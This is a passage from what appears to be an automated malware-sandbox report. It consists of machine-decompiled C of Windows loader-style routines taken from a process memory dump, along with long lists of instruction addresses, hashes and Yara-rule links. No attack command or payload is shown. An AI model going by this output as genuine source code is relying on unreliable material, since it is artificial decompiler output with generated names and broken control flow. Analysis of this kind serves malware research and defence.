							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E02AC3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E02ACB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x02aa4128
0x02aa4135
0x02aa413c
0x02aa4141
0x02aa4145
0x02aa4147
0x02aa414e
0x02aa4151
0x02aa4159
0x02aa415c
0x02aa4160
0x02aa4164
0x02aa4168
0x02aa416c
0x02aa417f
0x02aa4181
0x02aa446a
0x02aa446a
0x02aa418c
0x02aa4195
0x02aa4199
0x02aa4432
0x02aa4439
0x02aa443d
0x02aa4442
0x02aa4447
0x00000000
0x02aa419f
0x02aa41a3
0x02aa41b1
0x02aa41b9
0x02aa41bd
0x02aa45db
0x02aa45db
0x00000000
0x02aa41c3
0x02aa41c3
0x02aa41ce
0x02aa41d4
0x02aee138
0x02aee13e
0x02aee169
0x02aee16d
0x02aee19e
0x02aee16f
0x02aee16f
0x02aee175
0x02aee179
0x02aee18f
0x02aee193
0x00000000
0x02aee199
0x00000000
0x02aee199
0x02aee193
0x00000000
0x00000000
0x00000000
0x02aa41da
0x02aa41da
0x02aa41df
0x02aa41e4
0x02aa41ec
0x02aa4203
0x02aa4207
0x02aee1fd
0x02aa4222
0x02aa4226
0x02aee1f3
0x02aee1f3
0x02aa422c
0x02aa422c
0x02aa4233
0x02aee1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa4239
0x02aa4239
0x02aa4239
0x02aa4239
0x02aa4233
0x02aa4226
0x02aa41ee
0x02aa41ee
0x02aa41f4
0x02aa4575
0x02aee1b1
0x02aee1b1
0x00000000
0x02aa457b
0x02aa457b
0x02aa4582
0x02aee1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa4588
0x02aa4588
0x02aa458c
0x02aee1c4
0x02aee1c4
0x00000000
0x02aa4592
0x02aa4592
0x02aa4599
0x02aee1be
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa459f
0x02aa459f
0x02aa45a3
0x02aee1d7
0x02aee1e4
0x00000000
0x02aa45a9
0x02aa45a9
0x02aa45b0
0x02aee1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa45b6
0x02aa45b6
0x02aa45b6
0x00000000
0x02aa45b6
0x02aa45b0
0x02aa45a3
0x02aa4599
0x02aa458c
0x02aa4582
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa41f4
0x02aa423e
0x02aa4241
0x02aa45c0
0x02aa45c4
0x00000000
0x02aa45ca
0x02aa45ca
0x00000000
0x02aee207
0x02aee20f
0x00000000
0x00000000
0x00000000
0x00000000
0x02aa45d1
0x00000000
0x00000000
0x02aa45ca
0x00000000
0x02aa4247
0x02aa4247
0x02aa4247
0x02aa4249
0x02aa4249
0x02aa4249
0x02aa4251
0x02aa4251
0x02aa4257
0x02aa425f
0x02aa426e
0x02aa4270
0x02aa427a
0x02aee219
0x02aee219
0x02aa4280
0x02aa4282
0x02aa4456
0x02aa45ea
0x00000000
0x02aa45f0
0x02aee223
0x00000000
0x02aee223
0x02aa445c
0x02aa445c
0x00000000
0x02aa445c
0x00000000
0x02aa4288
0x02aa428c
0x02aee298
0x02aa4292
0x02aa4292
0x02aa429e
0x02aa42a3
0x02aa42a7
0x02aa42ac
0x02aee22d
0x02aa42b2
0x02aa42b2
0x02aa42b9
0x02aa42bc
0x02aa42c2
0x02aa42ca
0x02aa42cd
0x02aa42cd
0x02aa42d4
0x02aa433f
0x02aa433f
0x02aa42d6
0x02aa42d6
0x02aa42d9
0x02aa42dd
0x02aa42eb
0x02aee23a
0x02aa42f1
0x02aa4305
0x02aa430d
0x02aa4315
0x02aa4318
0x02aa431f
0x02aa4322
0x02aa432e
0x02aa433b
0x02aa433b
0x00000000
0x02aa432e
0x02aa42eb
0x02aa434c
0x02aa434e
0x02aa4352
0x02aa4359
0x02aa435e
0x02aa4361
0x02aa436e
0x02aa438a
0x02aa438e
0x02aa4396
0x02aa439e
0x02aa43a1
0x02aa43ad
0x02aa43bb
0x02aa43bb
0x02aa43ad
0x02aa436e
0x02aa43bf
0x02aa43c5
0x02aa4463
0x02aa4463
0x02aa43ce
0x02aa43d5
0x02aa43d9
0x02aa43df
0x02aa4475
0x02aa4479
0x02aa4491
0x02aa4491
0x02aa4479
0x02aa43e5
0x02aa43eb
0x02aa43f4
0x02aa43f6
0x02aa43f9
0x02aa43fc
0x02aa43ff
0x02aa44e8
0x02aa44ed
0x02aa44f3
0x02aee247
0x00000000
0x02aa44f9
0x02aa4504
0x02aa4508
0x02aa450f
0x02aee269
0x00000000
0x02aa4515
0x02aa4519
0x02aa4531
0x02aa4534
0x02aa4537
0x02aa453e
0x02aa4541
0x02aa454a
0x02aee255
0x02aee255
0x02aee25b
0x02aee25e
0x02aee261
0x02aee261
0x02aa4555
0x02aa4559
0x02aa455d
0x02aee26d
0x02aee270
0x02aee274
0x02aee27a
0x02aee27d
0x02aee28e
0x02aee28e
0x02aa4563
0x02aa4563
0x02aa4569
0x02aa4569
0x00000000
0x02aa455d
0x02aa450f
0x00000000
0x02aa44f3
0x02aa43ff
0x02aa4405
0x02aa4405
0x02aa4405
0x02aa42ac
0x02aa428c
0x02aa4282
0x02aa4407
0x02aa440d
0x02aee2af
0x02aee2af
0x02aa4413
0x02aa4413
0x00000000
0x02aa41d4
0x00000000
0x02aa41c3
0x02aa41bd
0x02aa4415
0x02aa4415
0x02aa4416
0x02aa4417
0x02aa4429
0x02aa416e
0x02aa416e
0x02aa4175
0x02aa4498
0x02aa449f
0x02aee12d
0x00000000
0x02aee133
0x00000000
0x02aee133
0x02aa44a5
0x02aa44a5
0x02aa44aa
0x00000000
0x02aa44bb
0x02aa44ca
0x02aa44d6
0x02aa44d7
0x02aa44d8
0x02aa44e3
0x02aa44e3
0x02aa44aa
0x02aa417b
0x02aa417b
0x02aa417b
0x00000000
0x02aa417b
0x02aa4175
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0c02f99271873c042a86f2792f5a9f6ba1754ea6cc061c490045c512d31746
Instruction ID: 74ff888d98ae3ce7d6b4a948481c073048dad6f8ad1612655cacc82e2bfe849b
Opcode Fuzzy Hash: 2a0c02f99271873c042a86f2792f5a9f6ba1754ea6cc061c490045c512d31746
Instruction Fuzzy Hash: 8CF16E706083118BCB28CF59C590A3AB7F2FF88718F15492EF486CB250EB74D896CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02A9D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E02A9D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x2b7d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E02A96600(0x2b752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x2b77b9c; // 0x0
							_t281 = L02AA4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E02ACF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x2b77b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x2b77b8c; // 0x2481d28
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E02AA2280(_t200, 0x2b784d8);
									_t277 =  *0x2b785f4; // 0x24821a8
									_t351 =  *0x2b785f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2482140
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E02A9FFB0(_t287, _t353, 0x2b784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E02ADCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E02A96600(0x2b752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E02A97926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x2b7b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E02B0E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x2b78472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x2b7b218; // 0x0
														asm("ror edi, cl");
														 *0x2b7b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E02AA2280(_t250, 0x2b784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L02AC3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E02A9FFB0(_t293, _t353, 0x2b784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E02AC37F5(_t353, 0);
																}
																E02AC0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E02AB9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E02AB02D6(_t174);
																}
																L02AA77F0( *0x2b77b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E02ABC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L02A9EC7F(_t353);
										L02AB19B8(_t287, 0, _t353, 0);
										_t200 = E02A8F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E02ACB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x2b7b2f8; // 0x110000
									if((_t206 |  *0x2b7b2fc) == 0 || ( *0x2b7b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x2b7b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E02B36B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E02B36AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E02A9E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L02A9EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E02AC9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E02A9E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L02A98F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02AC3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x02a9d5f2
0x02a9d5f5
0x02a9d5f5
0x02a9d5fd
0x02a9d600
0x02a9d60a
0x02a9d60d
0x02a9d617
0x02a9d61d
0x02a9d627
0x02a9d62e
0x02a9d911
0x02a9d913
0x00000000
0x02a9d919
0x02a9d919
0x02a9d919
0x02a9d634
0x02a9d634
0x02a9d634
0x02a9d634
0x02a9d640
0x02a9d8bf
0x00000000
0x02a9d646
0x02a9d646
0x02a9d64d
0x02a9d652
0x02aeb2fc
0x02aeb2fc
0x02aeb302
0x02aeb33b
0x02aeb341
0x00000000
0x02aeb304
0x02aeb304
0x02aeb319
0x02aeb31e
0x02aeb324
0x02aeb326
0x02aeb332
0x02aeb347
0x02aeb34c
0x02aeb351
0x02aeb35a
0x00000000
0x02aeb328
0x02aeb328
0x00000000
0x02aeb328
0x02aeb326
0x02a9d658
0x02a9d658
0x02a9d65b
0x02a9d665
0x00000000
0x02a9d66b
0x02a9d66b
0x02a9d66b
0x02a9d66b
0x02a9d66d
0x02a9d672
0x02a9d67a
0x00000000
0x00000000
0x02a9d680
0x02a9d686
0x02a9d8ce
0x02a9d8d4
0x02a9d8dd
0x02a9d8e0
0x02a9d68c
0x02a9d691
0x02a9d69d
0x02a9d6a2
0x02a9d6a7
0x02a9d6b0
0x02a9d6b5
0x02a9d6e0
0x02a9d6b7
0x02a9d6b7
0x02a9d6b9
0x02a9d6b9
0x02a9d6bb
0x02a9d6bd
0x02a9d6ce
0x02a9d6d0
0x02a9d6d2
0x02aeb363
0x02aeb365
0x00000000
0x02aeb36b
0x00000000
0x02aeb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02a9d6bf
0x02a9d6bf
0x02a9d6e5
0x02a9d6e7
0x02a9d6e9
0x02a9d6ec
0x02a9d6ec
0x02a9d6ef
0x02a9d6f5
0x02a9d6f9
0x02a9d6fb
0x02a9d6fd
0x02a9d701
0x02a9d703
0x02a9d70a
0x02a9d70a
0x02a9d701
0x02a9d710
0x02a9d710
0x02a9d6c1
0x02a9d6c1
0x02a9d6c6
0x02aeb36d
0x02aeb36f
0x00000000
0x02aeb375
0x02aeb375
0x02aeb375
0x00000000
0x02aeb375
0x00000000
0x02a9d6cc
0x02a9d6d8
0x02a9d6d8
0x02a9d6d8
0x00000000
0x02a9d6c6
0x02a9d6bf
0x00000000
0x02a9d6da
0x02a9d6da
0x02a9d716
0x02a9d71b
0x02a9d720
0x02a9d726
0x02a9d726
0x02a9d72d
0x00000000
0x02a9d733
0x02a9d739
0x02a9d742
0x02a9d750
0x02a9d758
0x02a9d764
0x02a9d776
0x02a9d77a
0x02a9d783
0x02a9d928
0x02a9d92c
0x02a9d93d
0x02a9d944
0x02a9d94f
0x02a9d954
0x02a9d956
0x02a9d95f
0x02a9d961
0x02a9d973
0x02a9d973
0x02a9d956
0x02a9d944
0x02a9d92c
0x02a9d78b
0x02aeb394
0x02a9d791
0x02a9d798
0x02aeb3a3
0x02aeb3bb
0x02aeb3bb
0x02a9d7a5
0x02a9d866
0x02a9d870
0x02a9d884
0x02a9d892
0x02a9d898
0x02a9d89e
0x02a9d8a0
0x02a9d8a6
0x02a9d8ac
0x02a9d8ae
0x02a9d8b4
0x02a9d8b4
0x02a9d8ae
0x02a9d7a5
0x02a9d78b
0x02a9d7b1
0x02aeb3c5
0x02aeb3c5
0x02a9d7c3
0x02a9d7ca
0x02a9d7e5
0x02a9d7eb
0x02a9d8eb
0x02a9d8ed
0x00000000
0x02a9d8f3
0x02a9d8f3
0x02a9d8f3
0x00000000
0x02a9d8ed
0x02a9d7cc
0x02a9d7cc
0x02a9d7d2
0x00000000
0x02a9d7d4
0x02a9d7d4
0x02a9d7d7
0x02a9d7df
0x02aeb3d4
0x02aeb3d9
0x02aeb3dc
0x02aeb3dc
0x02aeb3df
0x02aeb3e2
0x02aeb468
0x02aeb46d
0x02aeb46f
0x02aeb46f
0x02aeb475
0x02a9d8f8
0x02a9d8f9
0x02a9d8fd
0x02aeb3e8
0x02aeb3e8
0x02aeb3eb
0x02aeb3ed
0x00000000
0x02aeb3ef
0x02aeb3ef
0x02aeb3f1
0x02aeb3f4
0x02aeb3fe
0x02aeb404
0x02aeb409
0x02aeb40e
0x02aeb410
0x02aeb410
0x02aeb414
0x02aeb414
0x02aeb41b
0x02aeb420
0x02aeb423
0x02aeb425
0x02aeb427
0x02aeb42a
0x02aeb42d
0x02aeb42d
0x02aeb42a
0x02aeb432
0x02aeb436
0x02aeb438
0x02aeb43b
0x02aeb43b
0x02aeb449
0x02aeb44e
0x02aeb454
0x02aeb458
0x02aeb458
0x02aeb45d
0x00000000
0x02aeb45d
0x02aeb3ed
0x00000000
0x00000000
0x00000000
0x02a9d7df
0x02a9d7d2
0x02a9d7ca
0x02aeb37c
0x02aeb37e
0x02aeb385
0x02aeb38a
0x00000000
0x02aeb38a
0x02a9d742
0x02a9d7f1
0x02a9d7f8
0x02aeb49b
0x02aeb49b
0x02a9d800
0x02a9d837
0x02a9d843
0x02a9d845
0x02a9d847
0x02a9d84a
0x02a9d84b
0x02a9d84e
0x02a9d857
0x02a9d802
0x02a9d802
0x02a9d80d
0x00000000
0x02a9d818
0x02a9d818
0x02a9d824
0x02a9d831
0x02aeb4a5
0x02aeb4ab
0x02aeb4b3
0x02aeb4b8
0x02aeb4bb
0x00000000
0x02aeb4c1
0x02aeb4c1
0x02aeb4c8
0x00000000
0x02aeb4ce
0x02aeb4d4
0x02aeb4e1
0x02aeb4e3
0x02aeb4e5
0x00000000
0x02aeb4eb
0x02aeb4f0
0x02aeb4f2
0x02a9dac9
0x02a9dacc
0x02a9dacf
0x02a9dad1
0x02a9dd78
0x02a9dd78
0x02a9dcf2
0x00000000
0x02a9dad7
0x02a9dad9
0x02a9dadb
0x00000000
0x00000000
0x02a9dae1
0x02a9dae1
0x02a9dae4
0x02a9dae6
0x02aeb4f9
0x02aeb4f9
0x02aeb500
0x02a9daec
0x02a9daec
0x02a9daf5
0x02a9daf8
0x02a9dafb
0x02a9db03
0x02a9db11
0x02a9db16
0x02a9db19
0x02a9db1b
0x02aeb52c
